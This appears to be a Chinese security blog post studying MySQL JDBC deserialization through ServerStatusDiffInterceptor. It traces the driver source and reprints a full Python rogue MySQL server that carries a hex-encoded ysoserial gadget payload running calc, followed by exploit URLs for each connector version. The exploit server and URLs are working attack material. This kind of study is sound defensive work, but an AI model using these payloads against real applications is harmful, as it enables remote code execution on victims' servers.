JDBC反序列化漏洞学习
Posted bfengj
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前言
这篇稍微学习一下JDBC反序列化的漏洞原理,不同的版本有些许的区别,但主要就是两种利用方式,主要还是了解其中的原理,后面的POC编写那块看的有点懵,没看太懂,就只能直接用着大师傅们的脚本了。
ServerStatusDiffInterceptor利用
ServerStatusDiffInterceptor我本地复现用的是:
<dependency>
<groupId>mysql</groupId>
<artifactId>mysql-connector-java</artifactId>
<version>8.0.12</version>
</dependency>
关于版本的问题,最后会提到。
JDBC反序列化是BlackHat Europe 2019会议中的一个议题。
JDBC反序列化攻击成功就需要JDBC连接的时候,那个url可控:
package com.feng.test;
import java.sql.Connection;
import java.sql.DriverManager;
public class Test {
public static void main(String[] args) throws Exception{
Class.forName("com.mysql.jdbc.Driver");
String url = "jdbc:mysql://118.31.168.198:33306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor";
String username = "root";
String password = "root";
Connection connection = DriverManager.getConnection(url, username, password);
}
}
注意到连接多了两个参数:
autoDeserialize=true
queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor
属性queryInterceptors是查询拦截器,说白了就是一种过滤器,作用可能有点类似php中的__wakeup?
属性设置为com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor这个类之后,每次执行查询语句,都会调用拦截器的preProcess和postProcess方法。
而利用就在于com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor类的preProcess()方法:
@Override
public <T extends Resultset> T preProcess(Supplier<String> sql, Query interceptedQuery) {
populateMapWithSessionStatusValues(this.preExecuteValues);
return null; // we don't actually modify a result set
}
跟进populateMapWithSessionStatusValues():
private void populateMapWithSessionStatusValues(Map<String, String> toPopulate) {
java.sql.Statement stmt = null;
java.sql.ResultSet rs = null;
try {
try {
toPopulate.clear();
stmt = this.connection.createStatement();
rs = stmt.executeQuery("SHOW SESSION STATUS");
ResultSetUtil.resultSetToMap(toPopulate, rs);
先是执行了一条查询SHOW SESSION STATUS,获取这个查询的结果集rs,然后进入resultSetToMap()方法:
public static void resultSetToMap(Map mappedValues, ResultSet rs) throws SQLException {
while (rs.next()) {
mappedValues.put(rs.getObject(1), rs.getObject(2));
}
}
一个非常非常让人激动的方法,getObject()出现了。原作者关注到了ResultSet的实现类ResultSetImpl类的getObject()方法:
@Override
public Object getObject(int columnIndex) throws SQLException {
checkRowPos();
checkColumnBounds(columnIndex);
int columnIndexMinusOne = columnIndex - 1;
// we can't completely rely on code below because primitives have default values for null (e.g. int->0)
if (this.thisRow.getNull(columnIndexMinusOne)) {
return null;
}
Field field = this.columnDefinition.getFields()[columnIndexMinusOne];
switch (field.getMysqlType()) {
case BIT:
// TODO Field sets binary and blob flags if the length of BIT field is > 1; is it needed at all?
if (field.isBinary() || field.isBlob()) {
byte[] data = getBytes(columnIndex);
if (this.connection.getPropertySet().getBooleanProperty(PropertyDefinitions.PNAME_autoDeserialize).getValue()) {
Object obj = data;
if ((data != null) && (data.length >= 2)) {
if ((data[0] == -84) && (data[1] == -19)) {
// Serialized object?
try {
ByteArrayInputStream bytesIn = new ByteArrayInputStream(data);
ObjectInputStream objIn = new ObjectInputStream(bytesIn);
obj = objIn.readObject();
objIn.close();
bytesIn.close();
} catch (ClassNotFoundException cnfe) {
throw SQLError.createSQLException(Messages.getString("ResultSet.Class_not_found___91") + cnfe.toString()
+ Messages.getString("ResultSet._while_reading_serialized_object_92"), getExceptionInterceptor());
} catch (IOException ex) {
obj = data; // not serialized?
}
} else {
return getString(columnIndex);
}
}
return obj;
}
return data;
}
return field.isSingleBit() ? Boolean.valueOf(getBoolean(columnIndex)) : getBytes(columnIndex);
比较长,大致理一下思路叭。先是计算columnIndexMinusOne,然后根据这个得到Field,如果type是BIT,再判断数据是不是blob或者二进制数据,如果是就得到连接属性中的autoDeserialize是不是为true(所以给它设置为true)。然后再判断数据大小是不是大于2,是的话就判断第一个字节和第二个字节是不是-84和-19(Java中序列化后的对象的前两个字节是-84和-19,这是Java的一个标识),如果是就是激动人心的时刻了:
ByteArrayInputStream bytesIn = new ByteArrayInputStream(data);
ObjectInputStream objIn = new ObjectInputStream(bytesIn);
obj = objIn.readObject();
objIn.close();
bytesIn.close();
进行反序列化。我环境中带了commons-collections 3.1,这样就可以直接反序列化rce了。
思路比较容易理清,但关键就是,SHOW SESSION STATUS这个查询的返回的结果集如何编写。这个就比较难了,看下面的参考文章也没有看太懂,所以就只能直接用POC了:
# -*- coding:utf-8 -*-
#@Time : 2020/7/27 2:10
#@Author: Tri0mphe7
#@File : server.py
import socket
import binascii
import os
greeting_data="4a0000000a352e372e31390008000000463b452623342c2d00fff7080200ff811500000000000000000000032851553e5c23502c51366a006d7973716c5f6e61746976655f70617373776f726400"
response_ok_data="0700000200000002000000"
def receive_data(conn):
data = conn.recv(1024)
print("[*] Receiveing the package : {}".format(data))
return str(data).lower()
def send_data(conn,data):
print("[*] Sending the package : {}".format(data))
conn.send(binascii.a2b_hex(data))
def get_payload_content():
//file文件的内容使用ysoserial生成的 使用规则 java -jar ysoserial [common7那个] "calc" > a
file= r'a'
if os.path.isfile(file):
with open(file, 'rb') as f:
payload_content = str(binascii.b2a_hex(f.read()),encoding='utf-8')
print("open successs")
else:
print("open false")
#calc
payload_content='aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000463616c63740004657865637571007e001b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878'
return payload_content
# 主要逻辑
def run():
while 1:
conn, addr = sk.accept()
print("Connection come from {}:{}".format(addr[0],addr[1]))
# 1.先发送第一个 问候报文
send_data(conn,greeting_data)
while True:
# 登录认证过程模拟 1.客户端发送request login报文 2.服务端响应response_ok
receive_data(conn)
send_data(conn,response_ok_data)
#其他过程
data=receive_data(conn)
#查询一些配置信息,其中会发送自己的 版本号
if "session.auto_increment_increment" in data:
_payload='01000001132e00000203646566000000186175746f5f696e6372656d656e745f696e6372656d656e74000c3f001500000008a0000000002a00000303646566000000146368617261637465725f7365745f636c69656e74000c21000c000000fd00001f00002e00000403646566000000186368617261637465725f7365745f636f6e6e656374696f6e000c21000c000000fd00001f00002b00000503646566000000156368617261637465725f7365745f726573756c7473000c21000c000000fd00001f00002a00000603646566000000146368617261637465725f7365745f736572766572000c210012000000fd00001f0000260000070364656600000010636f6c6c6174696f6e5f736572766572000c210033000000fd00001f000022000008036465660000000c696e69745f636f6e6e656374000c210000000000fd00001f0000290000090364656600000013696e7465726163746976655f74696d656f7574000c3f001500000008a0000000001d00000a03646566000000076c6963656e7365000c210009000000fd00001f00002c00000b03646566000000166c6f7765725f636173655f7461626c655f6e616d6573000c3f001500000008a0000000002800000c03646566000000126d61785f616c6c6f7765645f7061636b6574000c3f001500000008a0000000002700000d03646566000000116e65745f77726974655f74696d656f7574000c3f001500000008a0000000002600000e036465660000001071756572795f63616368655f73697a65000c3f001500000008a0000000002600000f036465660000001071756572795f63616368655f74797065000c210009000000fd00001f00001e000010036465660000000873716c5f6d6f6465000c21009b010000fd00001f000026000011036465660000001073797374656d5f74696d655f7a6f6e65000c21001b000000fd00001f00001f000012036465660000000974696d655f7a6f6e65000c210012000000fd00001f00002b00001303646566000000157472616e73616374696f6e5f69736f6c6174696f6e000c21002d000000fd00001f000022000014036465660000000c776169745f74696d656f7574000c3f001500000008a000000000020100150131047574663804757466380475746638066c6174696e31116c6174696e315f737765646973685f6369000532383830300347504c013107343139343330340236300731303438353736034f4646894f4e4c595f46554c4c5f47524f55505f42592c5354524943545f5452414e535f5441424c45532c4e4f5f5a45524f5f494e5f444154452c4e4f5f5a45524f5f444154452c4552524f525f464f525f4449564953494f4e5f42595f5a45524f2c4e4f5f4155544f5f4352454154455f555345522c4e4f5f454e47494e455f535542535449545554494f4e0cd6d0b9fab1ead7bccab1bce4062b30383a30300f52455045415441424c452d5245414405323838303007000016fe000002000000'
send_data(conn,_payload)
data=receive_data(conn)
elif "show warnings" in data:
_payload = '01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f000059000005075761726e696e6704313238374b27404071756572795f63616368655f73697a6527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e59000006075761726e696e6704313238374b27404071756572795f63616368655f7479706527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e07000007fe000002000000'
send_data(conn, _payload)
data = receive_data(conn)
if "set names" in data:
send_data(conn, response_ok_data)
data = receive_data(conn)
if "set character_set_results" in data:
send_data(conn, response_ok_data)
data = receive_data(conn)
if "show session status" in data:
mysql_data = '0100000102'
mysql_data += '1a000002036465660001630163016301630c3f00ffff0000fc9000000000'
mysql_data += '1a000003036465660001630163016301630c3f00ffff0000fc9000000000'
# 为什么我加了EOF Packet 就无法正常运行呢??
//获取payload
payload_content=get_payload_content()
//计算payload长度
payload_length = str(hex(len(payload_content)//2)).replace('0x', '').zfill(4)
payload_length_hex = payload_length[2:4] + payload_length[0:2]
//计算数据包长度
data_len = str(hex(len(payload_content)//2 + 4)).replace('0x', '').zfill(6)
data_len_hex = data_len[4:6] + data_len[2:4] + data_len[0:2]
mysql_data += data_len_hex + '04' + 'fbfc'+ payload_length_hex
mysql_data += str(payload_content)
mysql_data += '07000005fe000022000100'
send_data(conn, mysql_data)
data = receive_data(conn)
if "show warnings" in data:
payload = '01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f00006d000005044e6f74650431313035625175657279202753484f572053455353494f4e20535441545553272072657772697474656e20746f202773656c6563742069642c6f626a2066726f6d2063657368692e6f626a73272062792061207175657279207265777269746520706c7567696e07000006fe000002000000'
send_data(conn, payload)
break
if __name__ == '__main__':
HOST ='0.0.0.0'
PORT = 3309
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#当socket关闭后,本地端用于该socket的端口号立刻就可以被重用.为了实验的时候不用等待很长时间
sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sk.bind((HOST, PORT))
sk.listen(1)
print("start fake mysql server listening on {}:{}".format(HOST,PORT))
run()
版本
另外的detectCustomCollations攻击方式就不看了,区别也不太大。
fnmsd师傅对于版本这方面也总结的比较透彻了,直接放他的总结结果了:
ServerStatusDiffInterceptor触发:
8.x:jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc
6.x(属性名不同):jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc
5.1.11及以上的5.x版本(包名没有了cj):jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_JRE8u20_calc
5.1.10及以下的5.1.X版本: 同上,但是需要连接后执行查询。
5.0.x: 还没有ServerStatusDiffInterceptor这个东西┓( ´∀` )┏
detectCustomCollations触发:
5.1.41及以上: 不可用
5.1.29-5.1.40:jdbc:mysql://127.0.0.1:3306/test?detectCustomCollations=true&autoDeserialize=true&user=yso_JRE8u20_calc
5.1.28-5.1.19:jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&user=yso_JRE8u20_calc
5.1.18以下的5.1.x版本: 不可用
5.0.x版本不可用
总结
自己还是太菜了呜呜,POC那里看不懂细节,Java小白还是得慢慢学习呀,以后再回来补充细节。
参考文章
https://blog.csdn.net/fnmsd/article/details/106232092
https://xz.aliyun.com/t/8159
https://www.mi1k7ea.com/2021/04/23/MySQL-JDBC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/
http://m0d9.me/2021/04/20/Jdbc-%E7%A2%8E%E7%A2%8E%E5%BF%B5%E4%BA%8C%EF%BC%9AMySQL-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/
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